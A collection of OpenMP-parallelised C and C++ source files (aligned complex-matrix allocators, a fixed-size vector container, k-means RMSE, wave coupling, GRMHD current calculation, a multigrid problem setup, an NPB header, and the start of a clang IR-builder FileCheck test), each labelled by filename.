fint calloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], float complex **const restrict A, fnat ldA[static restrict 1], float **const restrict Ar, fnat ldAr[static restrict 1], float **const restrict Ai, fnat ldAi[static restrict 1])
{
if (A)
*A = (float complex*)NULL;
*ldA = 0u;
if (Ar)
*Ar = (float*)NULL;
*ldAr = 0u;
if (Ai)
*Ai = (float*)NULL;
*ldAi = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VSL__2;
*ldA = (k ? (*m + (VSL_2 - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(float complex));
*A = (float complex*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VS z = _mm512_setzero_ps();
float complex *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VSL_2)
_mm512_store_ps((Aj + i), z);
}
}
if (salloc2_(m, n, Ar, ldAr) < 0)
return -5;
if (salloc2_(m, n, Ai, ldAi) < 0)
return -7;
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
fint zalloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], double complex **const restrict A, fnat ldA[static restrict 1], double **const restrict Ar, fnat ldAr[static restrict 1], double **const restrict Ai, fnat ldAi[static restrict 1])
{
if (A)
*A = (double complex*)NULL;
*ldA = 0u;
if (Ar)
*Ar = (double*)NULL;
*ldAr = 0u;
if (Ai)
*Ai = (double*)NULL;
*ldAi = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VDL__2;
*ldA = (k ? (*m + (VDL_2 - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(double complex));
*A = (double complex*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VD z = _mm512_setzero_pd();
double complex *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VDL_2)
_mm512_store_pd((Aj + i), z);
}
}
if (dalloc2_(m, n, Ar, ldAr) < 0)
return -5;
if (dalloc2_(m, n, Ai, ldAi) < 0)
return -7;
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
void czfree_(void **const A)
{
if (A) {
if (*A) {
free(*A);
*A = NULL;
}
}
}
|
fixed_size_vector.h | // -----------------------------------------------------------------------------
//
// Copyright (C) 2021 CERN & University of Surrey for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#define CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <initializer_list>
namespace bdm {
/// Vector with fixed number of elements == Array with push_back function that
/// keeps track of its size
/// NB: No bounds checking. Do not push_back more often than the number of
/// maximum elements given by the template parameter N
template <typename T, std::size_t N>
class FixedSizeVector {
public:
FixedSizeVector() {}
/// Constructor which accepts an std::initiliazer_list to set
/// the array's content.
/// \param l an initializer list
constexpr FixedSizeVector(const std::initializer_list<T>& l) {
assert(l.size() <= N);
auto it = l.begin();
for (size_t i = 0; i < N; i++) {
data_[i] = *(it++);
}
size_ = l.size();
}
size_t size() const { return size_; } // NOLINT
const T& operator[](size_t idx) const { return data_[idx]; }
T& operator[](size_t idx) { return data_[idx]; }
bool operator==(const FixedSizeVector& other) const {
if (size_ != other.size_) {
return false;
}
for (size_t i = 0; i < std::min(size_, other.size_); i++) {
if (data_[i] != other.data_[i]) {
return false;
}
}
return true;
}
FixedSizeVector& operator++() {
#pragma omp simd
for (size_t i = 0; i < N; i++) {
++data_[i];
}
return *this;
}
void clear() { size_ = 0; } // NOLINT
void push_back(const T& value) { // NOLINT
assert(size_ < N);
data_[size_++] = value;
}
const T* data() const { return data_; }
const T* begin() const { return &(data_[0]); } // NOLINT
const T* end() const { return &(data_[size_]); } // NOLINT
T* begin() { return &(data_[0]); } // NOLINT
T* end() { return &(data_[size_]); } // NOLINT
private:
T data_[N];
std::size_t size_ = 0;
};
} // namespace bdm
#endif // CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
|
rmse.c | /*************************************************************************/
/** File: rmse.c **/
/** Description: calculate root mean squared error of particular **/
/** clustering. **/
/** Author: Sang-Ha Lee **/
/** University of Virginia. **/
/** **/
/** Note: euclid_dist_2() and find_nearest_point() adopted from **/
/** Minebench code. **/
/** **/
/*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <float.h>
#include <math.h>
#include <omp.h>
#include "kmeans.h"
extern double wtime(void);
/*----< euclid_dist_2() >----------------------------------------------------*/
/* multi-dimensional spatial Euclid distance square */
__inline
float euclid_dist_2(float *pt1,
float *pt2,
int numdims)
{
int i;
float ans=0.0;
for (i=0; i<numdims; i++)
ans += (pt1[i]-pt2[i]) * (pt1[i]-pt2[i]);
return(ans);
}
/*----< find_nearest_point() >-----------------------------------------------*/
__inline
int find_nearest_point(float *pt, /* [nfeatures] */
int nfeatures,
float **pts, /* [npts][nfeatures] */
int npts)
{
int index, i;
float max_dist=FLT_MAX;
/* find the cluster center id with min distance to pt */
for (i=0; i<npts; i++) {
float dist;
dist = euclid_dist_2(pt, pts[i], nfeatures); /* no need square root */
if (dist < max_dist) {
max_dist = dist;
index = i;
}
}
return(index);
}
/*----< rms_err(): calculates RMSE of clustering >-------------------------------------*/
float rms_err (float **feature, /* [npoints][nfeatures] */
int nfeatures,
int npoints,
float **cluster_centres, /* [nclusters][nfeatures] */
int nclusters)
{
int i;
int nearest_cluster_index; /* cluster center id with min distance to pt */
float sum_euclid = 0.0; /* sum of Euclidean distance squares */
float ret; /* return value */
/* calculate and sum the sqaure of euclidean distance*/
#pragma omp parallel for \
shared(feature,cluster_centres) \
firstprivate(npoints,nfeatures,nclusters) \
private(i, nearest_cluster_index) \
schedule (static)
for (i=0; i<npoints; i++) {
nearest_cluster_index = find_nearest_point(feature[i],
nfeatures,
cluster_centres,
nclusters);
sum_euclid += euclid_dist_2(feature[i],
cluster_centres[nearest_cluster_index],
nfeatures);
}
/* divide by n, then take sqrt */
ret = sqrt(sum_euclid / npoints);
return(ret);
}
|
couple_waves.c | /*
* couple_waves.c
*
* Couple 3 waves contained in C99 complex arrays.
*
*/
#include <stdio.h>
#ifdef _OPENMP
#include <omp.h>
#endif
#include "mytypes.h"
#include "light.h"
#include "pf3dbench.h"
#include "util.h"
#include "runparm.h"
#include "pf3dbenchvars.h"
void couple_z(rcomplex * restrict t0, rcomplex * restrict t2,
rcomplex * restrict denp)
{
real c20, cslamt, snlamt, r_zlam, r, fratio;
real r_fratio, cratio, zac2;
double zlam, c2re, c2im;
rcomplex a0t, a2t, c2, z3;
int ix, iy, iz;
long it0;
cratio= 1.0e3;
fratio = SQRT(0.9);
r_fratio = ONE/fratio;
c20 = 0.25 * cratio * r_fratio;
start_omp_time();
#ifdef _OPENMP
/* #pragma omp parallel for simd aligned(t0,t2:64) simdlen(real_lane_count) COLLAPSE(3) private(c2, a0t, a2t, zlam, r_zlam, snlamt, cslamt, r, z3, it0, zac2, c2re, c2im) */
#pragma omp parallel for COLLAPSE(2) private(c2, a0t, a2t, zlam, r_zlam, snlamt, cslamt, r, z3, it0, zac2, c2re, c2im)
#endif
for (iz=0; iz<nzl; iz++) {
for (iy=0; iy<nyl; iy++) {
#ifdef _OPENMP
#pragma omp simd aligned(t0,t2:64) simdlen(real_lane_count)
#endif
for (ix=0; ix<nxl; ix++) {
it0= CELTNDX(ix,iy,iz);
c2 = c20 * denp[it0];
c2re = CREAL(c2); c2im = CIMAG(c2);
/* compute lamda = sqrt(|c2|^2) using doubles
to avoid underflow. */
zlam = c2re*c2re + c2im*c2im + 1.0e-34;
zlam = sqrt(zlam);
snlamt = SIN(zlam * dt * HALF);
cslamt = COS(zlam * dt * HALF);
a0t = t0[it0];
a2t = t2[it0] * fratio;
/* normalize c2 */
r_zlam= ONE/(real)zlam;
c2 *= r_zlam;
/* compute the square of c2 after scaling */
zac2 = zabs2(c2);
/* compute new A0 */
z3 = c2 * a2t * snlamt ;
t0[it0] = a0t * cslamt - IREAL * z3;
/* compute new A2 */
r = zac2 * cslamt;
z3 = CONJ(c2) * a0t * snlamt;
t2[it0] = ( a2t * r - IREAL * z3 ) * r_fratio;
} /* end for-loop */
} /* end for-loop */
}
stop_omp_time();
}
|
current.c | /*---------------------------------------------------------------------------------
CURRENT.C
-Calculate current from fluid variables
-----------------------------------------------------------------------------------*/
#include "decs.h"
double gFcon_calc(struct GridGeom *G, struct FluidState *S, int mu, int nu, int i, int j);
int antisym(int a, int b, int c, int d);
int pp(int n, int *P);
static struct FluidState *Sa;
// Calculate the current
void current_calc(struct GridGeom *G, struct FluidState *S, struct FluidState *Ssave, double dtsave)
{
timer_start(TIMER_CURRENT);
static int first_run = 1;
if (first_run)
{
//We only need the primitives, but this is fast
Sa = calloc(1,sizeof(struct FluidState));
first_run = 0;
}
// Calculate time-centered P
// Intel 18.0.2 crashes at these parallel directives
#if !INTEL_WORKAROUND
#pragma omp parallel for simd collapse(2)
#endif
PLOOP
{
ZLOOPALL
{
Sa->P[ip][j][i] = 0.5*(S->P[ip][j][i] + Ssave->P[ip][j][i]);
}
}
// Keep all get_state calls outside the loop so it doesn't modify S{a,save}
get_state_vec(G, S, CENT, -1, N2, -1, N1);
get_state_vec(G, Ssave, CENT, -1, N2, -1, N1);
get_state_vec(G, Sa, CENT, -1, N2, -1, N1);
#if !INTEL_WORKAROUND
#pragma omp parallel for simd collapse(2)
#endif
DLOOP1 ZLOOPALL S->jcon[mu][j][i] = 0.;
// Calculate j^{\mu} using centered differences for active zones
#pragma omp parallel for collapse(2)
ZLOOP
{
double gF0p[NDIM], gF0m[NDIM], gF1p[NDIM], gF1m[NDIM], gF2p[NDIM], gF2m[NDIM];
// Get sqrt{-g}*F^{mu nu} at neighboring points
// X0
DLOOP1
{
gF0p[mu] = gFcon_calc(G, S, 0, mu, i, j);
gF0m[mu] = gFcon_calc(G, Ssave, 0, mu, i, j);
}
// X1
DLOOP1
{
gF1p[mu] = gFcon_calc(G, Sa, 1, mu, i+1, j);
gF1m[mu] = gFcon_calc(G, Sa, 1, mu, i-1, j);
}
// X2
DLOOP1
{
gF2p[mu] = gFcon_calc(G, Sa, 2, mu, i, j+1);
gF2m[mu] = gFcon_calc(G, Sa, 2, mu, i, j-1);
}
// Difference: D_mu f^{mu nu} = 4 \pi j^nu
DLOOP1
{
// extra factor of sqrt(4*pi)*j given harm's b_unit
S->jcon[mu][j][i] = (1./(sqrt(4.*M_PI)*G->gdet[CENT][j][i]))*(
(gF0p[mu] - gF0m[mu])/dtsave +
(gF1p[mu] - gF1m[mu])/(2.*dx[1]) +
(gF2p[mu] - gF2m[mu])/(2.*dx[2]));
}
}
timer_stop(TIMER_CURRENT);
}
// Return mu, nu component of contravariant Maxwell tensor at grid zone i, j multiplied by gdet
inline double gFcon_calc(struct GridGeom *G, struct FluidState *S, int mu, int nu, int i, int j)
{
double Fcon;
if (mu == nu) return 0.;
Fcon = 0.;
for (int kap = 0; kap < NDIM; kap++)
{
for (int lam = 0; lam < NDIM; lam++)
{
Fcon += (-1./G->gdet[CENT][j][i])*antisym(mu,nu,kap,lam)*S->ucov[kap][j][i]*S->bcov[lam][j][i];
}
}
return Fcon*G->gdet[CENT][j][i];
}
// Completely antisymmetric 4D symbol
inline int antisym(int a, int b, int c, int d)
{
// Check for valid permutation
if (a < 0 || a > 3) return 100;
if (b < 0 || b > 3) return 100;
if (c < 0 || c > 3) return 100;
if (d < 0 || d > 3) return 100;
// Entries different?
if (a == b) return 0;
if (a == c) return 0;
if (a == d) return 0;
if (b == c) return 0;
if (b == d) return 0;
if (c == d) return 0;
// Determine parity of permutation
int p[4] = {a, b, c, d};
return pp(4, p);
}
// Due to Norm Hardy; good for general n
inline int pp(int n, int P[n])
{
int x;
int p = 0;
int v[n];
for (int j = 0; j < n; j++) v[j] = 0;
for (int j = 0; j < n; j++) {
if (v[j]) p++;
else
{
x = j;
do
{
x = P[x];
v[x] = 1;
} while (x != j);
}
}
if (p % 2 == 0) return 1;
else return -1;
}
|
problem.p4.c | //------------------------------------------------------------------------------------------------------------------------------
// Samuel Williams
// SWWilliams@lbl.gov
// Lawrence Berkeley National Lab
//------------------------------------------------------------------------------------------------------------------------------
void evaluateBeta(double x, double y, double z, double *B, double *Bx, double *By, double *Bz){
double Bmin = 1.0;
double Bmax = 10.0;
double c2 = (Bmax-Bmin)/2; // coefficients to affect this transition
double c1 = (Bmax+Bmin)/2;
double c3 = 10.0; // how sharply (B)eta transitions
double xcenter = 0.50;
double ycenter = 0.50;
double zcenter = 0.50;
// calculate distance from center of the domain (0.5,0.5,0.5)
double r2 = pow((x-xcenter),2) + pow((y-ycenter),2) + pow((z-zcenter),2);
double r2x = 2.0*(x-xcenter);
double r2y = 2.0*(y-ycenter);
double r2z = 2.0*(z-zcenter);
//double r2xx = 2.0;
//double r2yy = 2.0;
//double r2zz = 2.0;
double r = pow(r2,0.5);
double rx = 0.5*r2x*pow(r2,-0.5);
double ry = 0.5*r2y*pow(r2,-0.5);
double rz = 0.5*r2z*pow(r2,-0.5);
//double rxx = 0.5*r2xx*pow(r2,-0.5) - 0.25*r2x*r2x*pow(r2,-1.5);
//double ryy = 0.5*r2yy*pow(r2,-0.5) - 0.25*r2y*r2y*pow(r2,-1.5);
//double rzz = 0.5*r2zz*pow(r2,-0.5) - 0.25*r2z*r2z*pow(r2,-1.5);
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
*B = c1+c2*tanh( c3*(r-0.25) );
*Bx = c2*c3*rx*(1-pow(tanh( c3*(r-0.25) ),2));
*By = c2*c3*ry*(1-pow(tanh( c3*(r-0.25) ),2));
*Bz = c2*c3*rz*(1-pow(tanh( c3*(r-0.25) ),2));
}
//------------------------------------------------------------------------------------------------------------------------------
void evaluateU(double x, double y, double z, double *U, double *Ux, double *Uy, double *Uz, double *Uxx, double *Uyy, double *Uzz, int isPeriodic){
// should be continuous in u, u', and u''
// v(w) = w^4 - 2w^3 + w^2 + c
// u(x,y,z) = v(x)v(y)v(z)
// If Periodic, then the integral of the RHS should sum to zero.
// Setting shift=1/30 should ensure that the integrals of X, Y, or Z should sum to zero...
// That should(?) make the integrals of u,ux,uy,uz,uxx,uyy,uzz sum to zero and thus make the integral of f sum to zero
// If dirichlet, then w(0)=w(1) = 0.0
// Setting shift to 0 should ensure that U(x,y,z) = 0 on boundary
double shift = 0.0;if(isPeriodic)shift= -1.0/30.0;
double X = 1.0*pow(x,4) - 2.0*pow(x,3) + 1.0*pow(x,2) + shift;
double Y = 1.0*pow(y,4) - 2.0*pow(y,3) + 1.0*pow(y,2) + shift;
double Z = 1.0*pow(z,4) - 2.0*pow(z,3) + 1.0*pow(z,2) + shift;
double Xx = 4.0*pow(x,3) - 6.0*pow(x,2) + 2.0*x;
double Yy = 4.0*pow(y,3) - 6.0*pow(y,2) + 2.0*y;
double Zz = 4.0*pow(z,3) - 6.0*pow(z,2) + 2.0*z;
double Xxx = 12.0*pow(x,2) - 12.0*x + 2.0;
double Yyy = 12.0*pow(y,2) - 12.0*y + 2.0;
double Zzz = 12.0*pow(z,2) - 12.0*z + 2.0;
*U = X*Y*Z;
*Ux = Xx*Y*Z;
*Uy = X*Yy*Z;
*Uz = X*Y*Zz;
*Uxx = Xxx*Y*Z;
*Uyy = X*Yyy*Z;
*Uzz = X*Y*Zzz;
}
//------------------------------------------------------------------------------------------------------------------------------
void initialize_problem(level_type * level, double hLevel, double a, double b){
level->h = hLevel;
int box;
for(box=0;box<level->num_my_boxes;box++){
int i,j,k;
const int jStride = level->my_boxes[box].jStride;
const int kStride = level->my_boxes[box].kStride;
const int ghosts = level->my_boxes[box].ghosts;
const int dim_i = level->my_boxes[box].dim;
const int dim_j = level->my_boxes[box].dim;
const int dim_k = level->my_boxes[box].dim;
#ifdef _OPENMP
#pragma omp parallel for private(k,j,i) collapse(3)
#endif
for(k=0;k<=dim_k;k++){ // include high face
for(j=0;j<=dim_j;j++){ // include high face
for(i=0;i<=dim_i;i++){ // include high face
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
int ijk = (i+ghosts) + (j+ghosts)*jStride + (k+ghosts)*kStride;
double x = hLevel*( (double)(i+level->my_boxes[box].low.i) + 0.5 ); // +0.5 to get to the center of cell
double y = hLevel*( (double)(j+level->my_boxes[box].low.j) + 0.5 );
double z = hLevel*( (double)(k+level->my_boxes[box].low.k) + 0.5 );
double A,B,Bx,By,Bz,Bi,Bj,Bk;
double U,Ux,Uy,Uz,Uxx,Uyy,Uzz;
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
A = 1.0;
B = 1.0;
Bx = 0.0;
By = 0.0;
Bz = 0.0;
Bi = 1.0;
Bj = 1.0;
Bk = 1.0;
#ifdef STENCIL_VARIABLE_COEFFICIENT // variable coefficient problem...
evaluateBeta(x-hLevel*0.5,y ,z ,&Bi,&Bx,&By,&Bz); // face-centered value of Beta for beta_i
evaluateBeta(x ,y-hLevel*0.5,z ,&Bj,&Bx,&By,&Bz); // face-centered value of Beta for beta_j
evaluateBeta(x ,y ,z-hLevel*0.5,&Bk,&Bx,&By,&Bz); // face-centered value of Beta for beta_k
evaluateBeta(x ,y ,z ,&B ,&Bx,&By,&Bz); // cell-centered value of Beta
#endif
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
evaluateU(x,y,z,&U,&Ux,&Uy,&Uz,&Uxx,&Uyy,&Uzz, (level->boundary_condition.type == BC_PERIODIC) );
double F = a*A*U - b*( (Bx*Ux + By*Uy + Bz*Uz) + B*(Uxx + Uyy + Uzz) );
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
level->my_boxes[box].vectors[VECTOR_BETA_I][ijk] = Bi;
level->my_boxes[box].vectors[VECTOR_BETA_J][ijk] = Bj;
level->my_boxes[box].vectors[VECTOR_BETA_K][ijk] = Bk;
level->my_boxes[box].vectors[VECTOR_ALPHA ][ijk] = A;
//level->my_boxes[box].vectors[VECTOR_UTRUE ][ijk] = U; // obviated by Richardson analysis
level->my_boxes[box].vectors[VECTOR_F ][ijk] = F;
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
}}}
}
}
//------------------------------------------------------------------------------------------------------------------------------
|
header.h | /*--------------------------------------------------------------------
c---------------------------------------------------------------------
c
c header.h
c
c---------------------------------------------------------------------
c-------------------------------------------------------------------*/
/*--------------------------------------------------------------------
c The following include file is generated automatically by the
c "setparams" utility. It defines
c maxcells: the square root of the maximum number of processors
c problem_size: 12, 64, 102, 162 (for class T, A, B, C)
c dt_default: default time step for this problem size if no
c config file
c niter_default: default number of iterations for this problem size
--------------------------------------------------------------------*/
#ifndef _HEADER_H_
#define _HEADER_H_
#include "npbparams.h"
#include "../math/nas_math.h"
#define AA 0
#define BB 1
#define CC 2
#define BLOCK_SIZE 5
/* COMMON block: global */
static int grid_points[3]; /* grid_ponts(1:3) */
/* COMMON block: constants */
static double tx1, tx2, tx3, ty1, ty2, ty3, tz1, tz2, tz3;
static double dx1, dx2, dx3, dx4, dx5;
static double dy1, dy2, dy3, dy4, dy5;
static double dz1, dz2, dz3, dz4, dz5;
static double dssp, dt;
static double ce[5][13]; /* ce(5,13) */
static double dxmax, dymax, dzmax;
static double xxcon1, xxcon2, xxcon3, xxcon4, xxcon5;
static double dx1tx1, dx2tx1, dx3tx1, dx4tx1, dx5tx1;
static double yycon1, yycon2, yycon3, yycon4, yycon5;
static double dy1ty1, dy2ty1, dy3ty1, dy4ty1, dy5ty1;
static double zzcon1, zzcon2, zzcon3, zzcon4, zzcon5;
static double dz1tz1, dz2tz1, dz3tz1, dz4tz1, dz5tz1;
static double dnxm1, dnym1, dnzm1, c1c2, c1c5, c3c4, c1345;
static double conz1, c1, c2, c3, c4, c5, c4dssp, c5dssp, dtdssp;
static double dttx1, dttx2, dtty1, dtty2, dttz1, dttz2;
static double c2dttx1, c2dtty1, c2dttz1, comz1, comz4, comz5, comz6;
static double c3c4tx3, c3c4ty3, c3c4tz3, c2iv, con43, con16;
#define IMAX PROBLEM_SIZE
#define JMAX PROBLEM_SIZE
#define KMAX PROBLEM_SIZE
/*
c to improve cache performance, grid dimensions padded by 1
c for even number sizes only.
*/
/* COMMON block: fields */
static double *us_ptr;
static double *vs_ptr;
static double *ws_ptr;
static double *qs_ptr;
static double *rho_i_ptr;
static double *square_ptr;
static double *forcing_ptr;
static double *u_ptr;
static double *rhs_ptr;
static double *lhs_ptr;
static double *fjac_ptr;
static double *njac_ptr;
typedef double s_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
typedef double f_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5+1];
typedef double u_matrix_t[(IMAX+1)/2*2+1][(JMAX+1)/2*2+1][(KMAX+1)/2*2+1][5];
typedef double rhs_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5];
typedef double lhs_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][3][5][5];
typedef double jac_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
#define ACAST(T, ptr) (*(T*)ptr)
#define us ACAST(s_matrix_t, us_ptr)
#define vs ACAST(s_matrix_t, vs_ptr)
#define ws ACAST(s_matrix_t, ws_ptr)
#define qs ACAST(s_matrix_t, qs_ptr)
#define rho_i ACAST(s_matrix_t, rho_i_ptr)
#define square ACAST(s_matrix_t, square_ptr)
#define forcing ACAST(f_matrix_t, forcing_ptr)
#define u ACAST(u_matrix_t, u_ptr)
#define rhs ACAST(rhs_matrix_t, rhs_ptr)
#define lhs ACAST(lhs_matrix_t, lhs_ptr)
#define fjac ACAST(jac_matrix_t, fjac_ptr)
#define njac ACAST(jac_matrix_t, njac_ptr)
// static double us[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double vs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double ws[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double qs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double rho_i[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double square[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double forcing[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5+1];
// static double u[(IMAX+1)/2*2+1][(JMAX+1)/2*2+1][(KMAX+1)/2*2+1][5];
// static double rhs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5];
// static double lhs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][3][5][5];
/* COMMON block: work_1d */
double cuf[PROBLEM_SIZE];
double q[PROBLEM_SIZE];
double ue[PROBLEM_SIZE][5];
double buf[PROBLEM_SIZE][5];
#pragma omp threadprivate(cuf, q, ue, buf)
/*
c to improve cache performance, grid dimensions (first two for these
c to arrays) padded by 1 for even number sizes only.
*/
/* COMMON block: work_lhs */
// static double fjac[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
// /* fjac(5, 5, 0:IMAX/2*2, 0:JMAX/2*2, 0:KMAX-1) */
// static double njac[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
/* njac(5, 5, 0:IMAX/2*2, 0:JMAX/2*2, 0:KMAX-1) */
static double tmp1, tmp2, tmp3;
#endif
|
irbuilder_for_unsigned_static_chunked.c | // NOTE: Assertions have been autogenerated by utils/update_cc_test_checks.py UTC_ARGS: --function-signature --include-generated-funcs
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-enable-irbuilder -verify -fopenmp -fopenmp-version=45 -x c++ -triple x86_64-unknown-unknown -emit-llvm %s -o - | FileCheck %s
// expected-no-diagnostics
#ifndef HEADER
#define HEADER
// CHECK-LABEL: define {{.*}}@workshareloop_unsigned_static_chunked(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[A_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[B_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[C_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[D_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[I:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[AGG_CAPTURED:.+]] = alloca %struct.anon, align 8
// CHECK-NEXT: %[[AGG_CAPTURED1:.+]] = alloca %struct.anon.0, align 4
// CHECK-NEXT: %[[DOTCOUNT_ADDR:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_LASTITER:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_LOWERBOUND:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_UPPERBOUND:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_STRIDE:.+]] = alloca i32, align 4
// CHECK-NEXT: store float* %[[A:.+]], float** %[[A_ADDR]], align 8
// CHECK-NEXT: store float* %[[B:.+]], float** %[[B_ADDR]], align 8
// CHECK-NEXT: store float* %[[C:.+]], float** %[[C_ADDR]], align 8
// CHECK-NEXT: store float* %[[D:.+]], float** %[[D_ADDR]], align 8
// CHECK-NEXT: store i32 33, i32* %[[I]], align 4
// CHECK-NEXT: %[[TMP0:.+]] = getelementptr inbounds %struct.anon, %struct.anon* %[[AGG_CAPTURED]], i32 0, i32 0
// CHECK-NEXT: store i32* %[[I]], i32** %[[TMP0]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon.0, %struct.anon.0* %[[AGG_CAPTURED1]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: store i32 %[[TMP2]], i32* %[[TMP1]], align 4
// CHECK-NEXT: call void @__captured_stmt(i32* %[[DOTCOUNT_ADDR]], %struct.anon* %[[AGG_CAPTURED]])
// CHECK-NEXT: %[[DOTCOUNT:.+]] = load i32, i32* %[[DOTCOUNT_ADDR]], align 4
// CHECK-NEXT: br label %[[OMP_LOOP_PREHEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_PREHEADER]]:
// CHECK-NEXT: store i32 0, i32* %[[P_LOWERBOUND]], align 4
// CHECK-NEXT: %[[TMP3:.+]] = sub i32 %[[DOTCOUNT]], 1
// CHECK-NEXT: store i32 %[[TMP3]], i32* %[[P_UPPERBOUND]], align 4
// CHECK-NEXT: store i32 1, i32* %[[P_STRIDE]], align 4
// CHECK-NEXT: %[[OMP_GLOBAL_THREAD_NUM:.+]] = call i32 @__kmpc_global_thread_num(%struct.ident_t* @1)
// CHECK-NEXT: call void @__kmpc_for_static_init_4u(%struct.ident_t* @1, i32 %[[OMP_GLOBAL_THREAD_NUM]], i32 33, i32* %[[P_LASTITER]], i32* %[[P_LOWERBOUND]], i32* %[[P_UPPERBOUND]], i32* %[[P_STRIDE]], i32 1, i32 5)
// CHECK-NEXT: %[[OMP_FIRSTCHUNK_LB:.+]] = load i32, i32* %[[P_LOWERBOUND]], align 4
// CHECK-NEXT: %[[OMP_FIRSTCHUNK_UB:.+]] = load i32, i32* %[[P_UPPERBOUND]], align 4
// CHECK-NEXT: %[[TMP4:.+]] = add i32 %[[OMP_FIRSTCHUNK_UB]], 1
// CHECK-NEXT: %[[OMP_CHUNK_RANGE:.+]] = sub i32 %[[TMP4]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[OMP_DISPATCH_STRIDE:.+]] = load i32, i32* %[[P_STRIDE]], align 4
// CHECK-NEXT: %[[TMP5:.+]] = sub nuw i32 %[[DOTCOUNT]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[TMP6:.+]] = icmp ule i32 %[[DOTCOUNT]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[TMP7:.+]] = sub i32 %[[TMP5]], 1
// CHECK-NEXT: %[[TMP8:.+]] = udiv i32 %[[TMP7]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP9:.+]] = add i32 %[[TMP8]], 1
// CHECK-NEXT: %[[TMP10:.+]] = icmp ule i32 %[[TMP5]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP11:.+]] = select i1 %[[TMP10]], i32 1, i32 %[[TMP9]]
// CHECK-NEXT: %[[OMP_DISPATCH_TRIPCOUNT:.+]] = select i1 %[[TMP6]], i32 0, i32 %[[TMP11]]
// CHECK-NEXT: br label %[[OMP_DISPATCH_PREHEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_PREHEADER]]:
// CHECK-NEXT: br label %[[OMP_DISPATCH_HEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_HEADER]]:
